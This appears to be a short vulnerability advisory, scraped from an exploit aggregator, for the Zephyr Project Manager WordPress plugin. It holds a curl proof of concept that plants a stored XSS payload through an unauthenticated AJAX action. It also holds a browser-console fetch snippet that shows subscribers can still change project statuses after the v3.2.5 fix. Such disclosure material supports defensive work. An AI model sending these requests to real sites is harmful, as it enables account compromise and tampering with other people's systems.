## https://sploitus.com/exploit?id=WPEX-ID:82E01F95-81C2-46D8-898E-07B3B8A3F8C9
All AJAX actions are affected; below is an example of an unauthenticated stored XSS achieved by updating a Status:
```bash
curl -i -s -k -X $'POST' --data-binary $'name="><svg/onload=alert(/XSS/)>&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status' \
$'https://example.com/wp-admin/admin-ajax.php'
```
The XSS is triggered when an admin views the Statuses page (/wp-admin/admin.php?page=zephyr_project_manager_categories).

v3.2.5 fixed the CSRF and XSS; however, proper authorization was still missing, e.g. log in as a subscriber and run the command below in the browser's dev console:
```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'name=SetBySubscriber&color=%23eeeeee&slug=not_started&type=status&action=zpm_update_status&zpm_nonce=' + zpm_localized['zpm_nonce'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```